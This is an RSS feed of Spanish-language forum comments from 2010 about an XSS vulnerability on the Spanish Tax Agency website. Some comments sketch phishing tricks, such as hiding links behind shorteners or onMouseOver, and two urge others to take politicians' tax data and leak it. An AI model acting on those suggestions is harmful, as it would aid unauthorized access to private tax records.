<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" 
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:wfw="http://wellformedweb.org/CommentAPI/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:meneame="http://meneame.net/faq-es.php"
 >
<channel>
	<title>Menéame: comentarios [1018224]</title>
	<link>http://www.meneame.net</link>
	<image><title>www.meneame.net</title><link>http://www.meneame.net</link><url>http://cdn.mnmstatic.net/img/mnm/eli-rss.png</url></image>
	<description>Sitio colaborativo de publicación y comunicación entre blogs</description>
	<pubDate>Thu, 05 Aug 2010 10:54:54 +0000</pubDate>
	<generator>http://blog.meneame.net/</generator>
	<language>es</language>
	<item>
		<meneame:comment_id>6782071</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>28</meneame:order>
		<meneame:user>randomstirrer</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#28 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c028#c-28</link>
		<pubDate>Thu, 05 Aug 2010 10:54:54 +0000</pubDate>
		<dc:creator>randomstirrer</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c028#c-28</guid>
		<description><![CDATA[<p>que alguien saque las declaraciones de la renta de los politicos y las mande a wikileaks por favor...</p><p>&#187;&nbsp;autor: <strong>randomstirrer</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6779828</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>27</meneame:order>
		<meneame:user>mencabrona</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>17</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#27 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c027#c-27</link>
		<pubDate>Wed, 04 Aug 2010 22:22:30 +0000</pubDate>
		<dc:creator>mencabrona</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c027#c-27</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-24" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c024#c-24" rel="nofollow">#24</a> pues no... Quería decir <b>a seguir invirtiendo</b> y no <b>seguid invirtiendo</b>... como gusta en meneame el corregir...</p><p>&#187;&nbsp;autor: <strong>mencabrona</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6779055</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>26</meneame:order>
		<meneame:user>chencho</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#26 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c026#c-26</link>
		<pubDate>Wed, 04 Aug 2010 19:37:43 +0000</pubDate>
		<dc:creator>chencho</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c026#c-26</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> date un paseo por google y busca información sobre 48bits, el autor del post Rubén Santamarta y luego duda. Si dudas, vuelve a mirar.</p><p>&#187;&nbsp;autor: <strong>chencho</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6779046</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>25</meneame:order>
		<meneame:user>PussyLover</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>6</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#25 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c025#c-25</link>
		<pubDate>Wed, 04 Aug 2010 19:36:41 +0000</pubDate>
		<dc:creator>PussyLover</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c025#c-25</guid>
		<description><![CDATA[<p>Como siempre, la AEAT cubriéndose de gloria con estas cosas. No solo te hace bajar la seguridad al máximo del navegador on su certificado para la RENTA que encima esto. Un 0 para los palurdos que programan ahí.</p><p>&#187;&nbsp;autor: <strong>PussyLover</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778928</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>24</meneame:order>
		<meneame:user>prejudice</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>7</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#24 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c024#c-24</link>
		<pubDate>Wed, 04 Aug 2010 19:15:08 +0000</pubDate>
		<dc:creator>prejudice</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c024#c-24</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-1" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c01#c-1" rel="nofollow">#1</a> <i><b> Pero a seguir invirtiendo en macetas y rotondas que el I+D no genera beneficios. </b></i><br />
Supongo que querías decir segui<b>d</b> en imperativo y no segui<b>r</b> en infinitivo</p><p>&#187;&nbsp;autor: <strong>prejudice</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778714</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>23</meneame:order>
		<meneame:user>--148619--</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>9</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#23 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c023#c-23</link>
		<pubDate>Wed, 04 Aug 2010 18:38:37 +0000</pubDate>
		<dc:creator>--148619--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c023#c-23</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> <a class="tooltip c:1018224-5" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c05#c-5" rel="nofollow">#5</a> ... no os olvideis que una URL de ese tipo siempre se puede enmascarar en un acortador de urls o con un redirect puesto en una web tipo:<br />
<a href="http://laaeat.es/" title="laaeat.es/" rel="nofollow">laaeat.es/</a> con dominio resultón</p><p>&#187;&nbsp;autor: <strong>--148619--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778354</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>22</meneame:order>
		<meneame:user>jonolulu</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#22 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c022#c-22</link>
		<pubDate>Wed, 04 Aug 2010 17:33:32 +0000</pubDate>
		<dc:creator>jonolulu</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c022#c-22</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-15" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c015#c-15" rel="nofollow">#15</a> Tampoco te fíes mucho de la barra, porque con un onMouseOver se puede disfrazar</p><p>&#187;&nbsp;autor: <strong>jonolulu</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778260</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>21</meneame:order>
		<meneame:user>aironman</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#21 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c021#c-21</link>
		<pubDate>Wed, 04 Aug 2010 17:16:57 +0000</pubDate>
		<dc:creator>aironman</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c021#c-21</guid>
		<description><![CDATA[<p>simplemente patetico y creo que <a class="tooltip c:1018224-19" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c019#c-19" rel="nofollow">#19</a> y <a class="tooltip c:1018224-17" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c017#c-17" rel="nofollow">#17</a> tienen razon, es la realidad del sector informatico, por lo menos en madrid...</p><p>&#187;&nbsp;autor: <strong>aironman</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778215</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>20</meneame:order>
		<meneame:user>Eversmann</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#20 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c020#c-20</link>
		<pubDate>Wed, 04 Aug 2010 17:08:40 +0000</pubDate>
		<dc:creator>Eversmann</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c020#c-20</guid>
		<description><![CDATA[<p>Que miren los de bono, camps, barberá, roca, los de mallorca, los de la gurtel, los del palau... etc.</p><p>&#187;&nbsp;autor: <strong>Eversmann</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778145</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>19</meneame:order>
		<meneame:user>--82961--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>19</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#19 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c019#c-19</link>
		<pubDate>Wed, 04 Aug 2010 16:51:58 +0000</pubDate>
		<dc:creator>--82961--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c019#c-19</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-16" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c016#c-16" rel="nofollow">#16</a> No lo entiendo, evitar el XSS es tan simple como enviar sólo información (usando json o xml por ejemplo). El SQL inyection cualquier ORM (todos los framework traen uno) o incluso las preprared statement (por si no quiere usar framework para una aplicación casera) que traen de serie los lenguajes lo evitan.<br />
<br />
Lo que explica que haya esos fallos garrafales y a priori muy fáciles de evitar es que a los curritos finales (quienes realizan el trabajo) se les exprime hasta la última gota y tengan que hacer el trabajo para ayer y por cuatro duros (viene a ser lo que dice <a class="tooltip c:1018224-17" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c017#c-17" rel="nofollow">#17</a>)</p><p>&#187;&nbsp;autor: <strong>--82961--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6778078</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>18</meneame:order>
		<meneame:user>--132201--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>12</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#18 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c018#c-18</link>
		<pubDate>Wed, 04 Aug 2010 16:38:18 +0000</pubDate>
		<dc:creator>--132201--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c018#c-18</guid>
		<description><![CDATA[<p>Que alguien utilice esto para conseguir los datos fiscales de los políticos corruptos. Por una parte se obtiene transparencia, por otra seguro que tras eso arreglan la vulnerabilidad en 10 minutos.</p><p>&#187;&nbsp;autor: <strong>--132201--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777969</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>17</meneame:order>
		<meneame:user>xavipuerto</meneame:user>
		<meneame:votes>6</meneame:votes>
		<meneame:karma>54</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#17 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c017#c-17</link>
		<pubDate>Wed, 04 Aug 2010 16:10:55 +0000</pubDate>
		<dc:creator>xavipuerto</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c017#c-17</guid>
		<description><![CDATA[<p>pasa por sub-sub-sub-sub contratar algo en informatica<br />
<br />
esa es la pura realidad</p><p>&#187;&nbsp;autor: <strong>xavipuerto</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777888</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>16</meneame:order>
		<meneame:user>--127714--</meneame:user>
		<meneame:votes>3</meneame:votes>
		<meneame:karma>33</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#16 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c016#c-16</link>
		<pubDate>Wed, 04 Aug 2010 15:55:47 +0000</pubDate>
		<dc:creator>--127714--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c016#c-16</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-6" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c06#c-6" rel="nofollow">#6</a> No es tan increible que se cometan esos errores, están a la orden del día, XSS es ya el error más común en la web, seguido de cerca por el SQL injection... Si se sigue fichando a diseñadores para hacer el trabajo de programadores, pasa lo que pasa, si no se les da formación en seguridad, pasa lo que pasa.</p><p>&#187;&nbsp;autor: <strong>--127714--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777862</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>15</meneame:order>
		<meneame:user>--127714--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#15 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c015#c-15</link>
		<pubDate>Wed, 04 Aug 2010 15:48:45 +0000</pubDate>
		<dc:creator>--127714--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c015#c-15</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> Sí, siempre será menos peligroso que un XSS persistente, pero no deja de ser un megafallo para una web con datos tan delicados.<br />
<br />
Y con lo de picar en un enlace ya sabes <i>&#60;a href=&#34;<a href="http://www.google.com&#34;&#62;http://www.bing.com&#60;/a&gt" title="www.google.com&#34;&#62;http://www.bing.com&#60;/a&gt" rel="nofollow">www.google.com&#34;&#62;http://www.bing.com&#60;/a&gt</a>;</i> nadie mira el href (la barra de estado) sólo miran lo que pone en el link...<br />
<br />
edit... tsk <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/shame.png" alt="¬¬" title="¬¬ :shame:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--127714--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777855</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>14</meneame:order>
		<meneame:user>guifre</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>19</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#14 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c014#c-14</link>
		<pubDate>Wed, 04 Aug 2010 15:47:01 +0000</pubDate>
		<dc:creator>guifre</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c014#c-14</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> no siquiera haría falta pinchar un enlace, si el autor del blog hubiera puesto algo tipo &#60;img src=&#34;código malicioso&#34;/&#62; o incluso con una petición ajax... lo hubieras ejecutado sólo con visitar su blog sin darte cuenta... No es para tomárselo en broma.</p><p>&#187;&nbsp;autor: <strong>guifre</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777830</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>13</meneame:order>
		<meneame:user>--58118--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>15</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#13 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c013#c-13</link>
		<pubDate>Wed, 04 Aug 2010 15:42:29 +0000</pubDate>
		<dc:creator>--58118--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c013#c-13</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-2" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c02#c-2" rel="nofollow">#2</a> El &#34;PLAN E&#34; no fue aprobado por ningún ayuntamiento.</p><p>&#187;&nbsp;autor: <strong>--58118--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777680</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>12</meneame:order>
		<meneame:user>Peka</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>21</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#12 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c012#c-12</link>
		<pubDate>Wed, 04 Aug 2010 15:14:32 +0000</pubDate>
		<dc:creator>Peka</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c012#c-12</guid>
		<description><![CDATA[<p>El fallo no afecta a las 4 haciendas vascas.</p><p>&#187;&nbsp;autor: <strong>Peka</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6777040</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>11</meneame:order>
		<meneame:user>mencabrona</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>18</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#11 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c011#c-11</link>
		<pubDate>Wed, 04 Aug 2010 13:01:09 +0000</pubDate>
		<dc:creator>mencabrona</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c011#c-11</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-2" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c02#c-2" rel="nofollow">#2</a> ¡¿El ayuntamiento!? En serío??? pensaba que era el mismisimo Rodriguez Zapatero el que iba con su furgoneta poniendo macetas...<br />
<br />
Hay que saber leer los comentarios y a un buen entendedor pocas palabras le bastan.</p><p>&#187;&nbsp;autor: <strong>mencabrona</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776985</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>10</meneame:order>
		<meneame:user>wendigo</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>18</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#10 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c010#c-10</link>
		<pubDate>Wed, 04 Aug 2010 12:53:32 +0000</pubDate>
		<dc:creator>wendigo</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c010#c-10</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-9" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c09#c-9" rel="nofollow">#9</a> Me recuerda mis viejos tiempos brujuleando por foros sobre hacks y demas ... donde este tipo de enlaces son la norma... demuestra un fallo, pero lógicamente el enlace es erróneo, y solo alguien que sepa mucho del asunto sabrá encontrar el fallo del mismo... o como en este caso el XXXXXXXXX. amos que esta directamente censurado. <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/grin.png" alt=":-D" title=":-D" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /><br />
<br />
Saludos<br />
PD <i>¿cual es la contraseña de admin? </i>: <strong>*********</strong></p><p>&#187;&nbsp;autor: <strong>wendigo</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776934</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>9</meneame:order>
		<meneame:user>cocido</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>22</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#9 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c09#c-9</link>
		<pubDate>Wed, 04 Aug 2010 12:45:38 +0000</pubDate>
		<dc:creator>cocido</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c09#c-9</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-8" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c08#c-8" rel="nofollow">#8</a> ¿Qué link? ¿El que tiene XXXXXXXXXXXXXXXXXXXXXXXXXXX tapando la mitad? <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/lol.gif" alt="xD" title=":lol: xD" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>cocido</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776926</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>8</meneame:order>
		<meneame:user>--51656--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>4</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#8 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c08#c-8</link>
		<pubDate>Wed, 04 Aug 2010 12:44:46 +0000</pubDate>
		<dc:creator>--51656--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c08#c-8</guid>
		<description><![CDATA[<p>Bueno, yo acabo de probar el link con el error xss y no me ejecuta el script.. Quizá lo hayan corregido..</p><p>&#187;&nbsp;autor: <strong>--51656--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776900</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>7</meneame:order>
		<meneame:user>jonolulu</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>21</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#7 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c07#c-7</link>
		<pubDate>Wed, 04 Aug 2010 12:39:48 +0000</pubDate>
		<dc:creator>jonolulu</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c07#c-7</guid>
		<description><![CDATA[<p>¿Y no ha habido denuncia a la Agencia de Protección de Datos? De hecho creo que tendría que actuar de oficio</p><p>&#187;&nbsp;autor: <strong>jonolulu</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>6776879</meneame:comment_id>
		<meneame:link_id>1018224</meneame:link_id>
		<meneame:order>6</meneame:order>
		<meneame:user>--1--</meneame:user>
		<meneame:votes>8</meneame:votes>
		<meneame:karma>83</meneame:karma>
		<meneame:url>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos</meneame:url>
		<title>#6 Vulnerabilidad XSS en la web de la Agencia Tributaria permite robar datos fiscales</title>
		<link>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c06#c-6</link>
		<pubDate>Wed, 04 Aug 2010 12:36:53 +0000</pubDate>
		<dc:creator>--1--</dc:creator>
		<guid>https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c06#c-6</guid>
		<description><![CDATA[<p><a class="tooltip c:1018224-3" href="https://www.meneame.net/story/vulnerabilidad-xss-web-agencia-tributaria-permite-robar-datos/c03#c-3" rel="nofollow">#3</a> <br />
<br />
&#62; Si el &#34;asunto&#34; pasa porque la víctima tenga que pinchar en un enlace creado por nosotros...<br />
<br />
En eso se basa el XSS, y la inmensa mayoría de los ataques requieren alguna acción del usuario, muchas de ellas hacer un clic en el web, o al attachment de un email.<br />
<br />
Si realmente se pueden obtener datos fiscales con XSS es muy grave, si además se puede modificar, es gravísimo, casi increíble que se cometan esos errores (pero no lo sé).<br />
<br />
